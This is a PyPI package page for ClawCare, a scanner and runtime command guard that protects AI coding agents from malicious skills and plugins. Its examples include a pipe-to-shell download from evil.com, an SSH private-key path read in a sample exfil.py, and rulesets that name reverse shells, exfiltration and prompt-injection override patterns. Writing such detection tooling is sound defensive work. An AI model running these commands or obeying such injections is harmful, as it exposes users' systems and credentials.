Skip to main content

Guardian engine for agentic-tool extension supply-chain security

Project description

🦞ClawCare

ClawCare

Run AI agents with care - OpenClaw, Claude Code and more

ClawCare is a multi-platform security tool to prevent AI agent skills, plugins and instructions from attacks. It scans and reports supply-chain threats like command injection, credential theft, and data exfiltration. It also provides runtime command interception (ClawCare Guard) that blocks dangerous commands before they execute. Use it as a CLI tool, integrate into CI/CD, or install as a hook/plugin for your agent platform.

OpenClaw Claude Code Codex Cursor License Python

Why

AI coding agents (Claude Code, Cursor, Codex, OpenClaw) let you install third-party skills and plugins that can read your files, run commands, access secrets and extract sensitive data. A malicious skill can:

  • Pipe remote scripts into your shell (curl ... | bash)
  • Steal SSH keys and API tokens
  • Set up cron persistence
  • Transfer PII data to external servers

ClawCare catches these patterns before they run — both statically (scanning files) and at runtime (intercepting commands) — and gives you full visibility into the risks.

Demo

See ClawCare in action:

👉 ClawCare Demo — static scan, runtime guard, CI blocking, and custom adapters.

Quick Start

Install

pip install clawcare

Scan

# Scan a project — auto-detects the platform
clawcare scan .

# CI mode — exit code 2 on HIGH+ findings (use in GitHub Actions)
clawcare scan . --ci

# JSON output for downstream tooling
clawcare scan . --format json --json-out report.json

Configure

Drop a .clawcare.yml in your project root to customize scan behavior:

scan:
  fail_on: high          # block CI on high+ findings
  ignore_rules:
    - MED_JS_EVAL        # suppress rules you've accepted
  exclude:
    - "vendor/**"        # skip directories

CLI flags override config values. See Project Configuration for the full reference.

Example Output

============================================================
ClawCare Scan Report
============================================================
Path:     ./my-project
Adapter:  claude_code v0.1.0
Mode:     ci
Fail on:  high

── CRITICAL (2) ──
  [CRIT_PIPE_TO_SHELL] skills/setup/SKILL.md:15
    curl -fsSL https://.../install.sh | bash
    → Piping remote content directly into a shell interpreter.
    ✎ Download first, inspect, then execute.

  [CRIT_CREDENTIAL_PATH] skills/setup/exfil.py:18
    os.path.expanduser("~/.ssh/id_rsa")
    → Accessing well-known credential paths.
    ✎ Use a secrets manager instead.

Findings: 2 critical, 1 high, 0 medium, 0 low
============================================================

Features

ClawCare Guard — Runtime Command Interception

ClawCare Guard intercepts commands at runtime — before the agent executes them. Currently supports Claude Code and OpenClaw.

Quick Start

# Install hooks for Claude Code
clawcare guard activate --platform claude

# Install plugin for OpenClaw
clawcare guard activate --platform openclaw

# Check status
clawcare guard status --platform claude

Once activated, every Bash/shell command the agent tries to run is scanned against ClawCare's rulesets. Dangerous commands are blocked; warnings are logged.

# Agent tries to run:
#   curl -fsSL https://evil.com/payload.sh | bash
#
# ClawCare output:
# [CRITICAL] CRIT_PIPE_TO_SHELL: Piping remote content into shell
# ⛔ ClawCare BLOCKED: curl -fsSL https://evil.com/payload.sh | bash

Guard Configuration

Create ~/.clawcare/config.yml:

guard:
  fail_on: high            # minimum severity to block (low|medium|high|critical)
  audit:
    enabled: true
    log_path: "~/.clawcare/history.jsonl"

Audit Trail

Every command decision (allow / warn / block) is logged to a JSONL audit file.

# View recent events
clawcare guard report --since 24h

# Only blocked/warned commands
clawcare guard report --only-violations

# JSON format for tooling
clawcare guard report --format json --since 7d

How It Works

Platform Mechanism Hook Type
Claude Code PreToolUse / PostToolUse hooks with matcher objects in ~/.claude/settings.json {"type": "command", "command": "..."}
OpenClaw TypeScript plugin installed to ~/.openclaw/extensions/ before_tool_call / after_tool_call via plugin API

Deactivate

clawcare guard deactivate --platform claude
clawcare guard deactivate --platform openclaw

Platform Adapters for Claude Code, OpenClaw, Codex and Cursor Agent Skills

Auto-detects the AI agent platform and scans the right files:

Platform Scans Detection
Claude Code .claude/skills/*/SKILL.md + code .claude-plugin/, SKILL.md
Cursor .cursor/rules/*.mdc, .cursorrules + skills .cursor/ directory
Codex AGENTS.md, AGENTS.override.md + skills AGENTS.md
OpenClaw SKILL.md + code in skill directories .opencode/

All following the file structure of the respective AI agent platforms.

Only plugin and skill files are scanned — your application code, README, and CI configs are never touched.

Project Configuration

Create a .clawcare.yml in your project root:

scan:
  fail_on: high              # minimum severity to block CI (critical | high | medium | low)
  block_local: false         # block locally too? (default: warn only)
  ignore_rules:
    - MED_JS_EVAL            # suppress specific rules
  exclude:
    - "vendor/**"            # skip directories
  max_file_size_kb: 512      # skip large files
  rulesets:
    - default                # built-in rules (included by default)
    - ./my-custom-rules      # add your own

CLI flags override config values. Excludes and rulesets from both sources merge.

Policy Manifests

Skills/Plugins can declare their permissions in a clawcare.manifest.yml:

permissions:
  exec: none           # no shell execution
  network: allowlist   # only listed domains
  filesystem: read_only
  secrets: none
  persistence: forbidden

allowed_domains:
  - api.anthropic.com

ClawCare enforces these declarations — violations appear as HIGH/CRITICAL findings.

Custom Rulesets

Create your own rules as YAML:

rules:
  - id: MY_NO_INTERNAL_URLS
    pattern: "https://internal\\.corp\\.com"
    severity: high
    description: "References to internal URLs should not appear in extensions."
    recommendation: "Use environment variables for internal endpoints."

Place in a folder, then: clawcare scan . --ruleset ./my-rules

Custom Adapters

ClawCare supports custom adapters for scanning any AI agent platform. An adapter implements four methods:

# my_adapter.py
from clawcare.models import ExtensionRoot

class MyAdapter:
    name = "my_platform"
    version = "0.1.0"
    priority = 50

    def detect(self, target_path: str) -> float:
        """Return 0.0–1.0 confidence that this adapter applies."""
        ...

    def discover_roots(self, target_path: str) -> list[ExtensionRoot]:
        """Return extension roots to scan."""
        ...

    def scan_scope(self, root: ExtensionRoot) -> dict:
        """Return include/exclude globs for this root."""
        return {
            "include_globs": ["*.md", "*.py", "*.yml"],
            "exclude_globs": [".git", "node_modules"],
        }

    def default_manifest(self, root: ExtensionRoot) -> str | None:
        """Return path to clawcare.manifest.yml, or None."""
        return None

Use it via import string:

clawcare scan path/ --adapter import:my_adapter:MyAdapter

Or register permanently via entry point in your pyproject.toml:

[project.entry-points."clawcare.adapters"]
my_platform = "my_adapter:MyAdapter"

See clawcare/adapters/base.py for the full protocol, or any of the built-in adapters for real examples.

Built-in Rules

Three rulesets ship by default, organized by attack category:

Ruleset Catches
execution-abuse Pipe-to-shell, reverse shells, credential theft, persistence, destructive commands, subprocess abuse
data-exfiltration Hardcoded AWS keys, SSH keys, API tokens, SSN/credit card numbers, IP addresses, env-variable exfiltration
prompt-injection Instruction override, role hijacking, ignore-previous-instructions patterns

All rules include CWE references where applicable. Rules are used by both the static scanner and the runtime guard.

CI Integration

GitHub Actions

- name: Install ClawCare
  run: pip install clawcare

- name: Scan for malicious extensions
  run: clawcare scan . --ci

CLI Reference

clawcare scan <path> [OPTIONS]

Options:
  --ci                    CI mode (exit 2 on findings above threshold)
  --fail-on SEVERITY      Minimum severity to block: critical|high|medium|low (default: high)
  --block-local           Block locally too (default: warn only, exit 0)
  --format FORMAT         Output format: text|json (default: text)
  --json-out FILE         Write JSON report to file
  --adapter NAME          Force a specific adapter (default: auto-detect)
  --ruleset PATH          Additional rulesets (repeatable)
  --exclude GLOB          Exclude glob patterns (repeatable)
  --max-file-size-kb N    Skip files larger than N KB
  --manifest MODE         Manifest enforcement: auto|skip|strict (default: auto)

clawcare adapters list    List registered adapters

Guard CLI

clawcare guard run -- <COMMAND>       Scan and execute a command (wrapper mode)
  --fail-on SEVERITY                  Minimum severity to block (default: from config or high)
  --dry-run                           Scan only — do not execute
  --config PATH                       Path to guard config file

clawcare guard activate               Install hooks/plugin for a platform
  --platform claude|openclaw
  --settings PATH                     Path to settings file (auto-detected if omitted)
  --project                           Install at project level (Claude only)

clawcare guard deactivate             Remove hooks/plugin
  --platform claude|openclaw

clawcare guard status                 Check whether hooks are installed
  --platform claude|openclaw

clawcare guard report                 Query audit history
  --since DURATION                    Relative time (e.g. 24h, 30m, 7d) or ISO timestamp
  --only-violations                   Show only events with findings
  --format text|json                  Output format (default: text)
  --limit N                           Max events to show (default: 100)
  --log-path PATH                     Override audit log path

clawcare guard hook                   (internal) Handle a platform hook event
  --platform claude|openclaw
  --stage pre|post

Contributing

See CONTRIBUTING.md for development instructions.

License

Apache 2.0

Project details


Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

clawcare-0.8.0.tar.gz (75.6 kB view details)

Uploaded Source

Built Distribution

If you're not sure about the file name format, learn more about wheel file names.

clawcare-0.8.0-py3-none-any.whl (56.1 kB view details)

Uploaded Python 3

File details

Details for the file clawcare-0.8.0.tar.gz.

File metadata

  • Download URL: clawcare-0.8.0.tar.gz
  • Upload date:
  • Size: 75.6 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.12.8

File hashes

Hashes for clawcare-0.8.0.tar.gz
Algorithm Hash digest
SHA256 9c328074a7850f3f88b457bca9bc5a0279f9d50a402f162309a796d2e26e5d0f
MD5 2ace936c790653a08fd9eb2ccf79dc80
BLAKE2b-256 e1c4bfaabd1f4ea6c4a253f0ccde870a1ca92f7caa9a6a2d705890cb9a000415

See more details on using hashes here.

File details

Details for the file clawcare-0.8.0-py3-none-any.whl.

File metadata

  • Download URL: clawcare-0.8.0-py3-none-any.whl
  • Upload date:
  • Size: 56.1 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/6.2.0 CPython/3.12.8

File hashes

Hashes for clawcare-0.8.0-py3-none-any.whl
Algorithm Hash digest
SHA256 a5a906e4656b769f4378e4e3288cae4fb6c618a46bbaf46995d0b7127ea0c508
MD5 b0b6eda02a2161486a3f7f2f98cc7168
BLAKE2b-256 931cb4478463051249e6188f058aaa8f051392fc889df68826d7fa718bbc31f6

See more details on using hashes here.

Supported by

AWS Cloud computing and Security Sponsor Datadog Monitoring Depot Continuous Integration Fastly CDN Google Download Analytics Pingdom Monitoring Sentry Error logging StatusPage Status page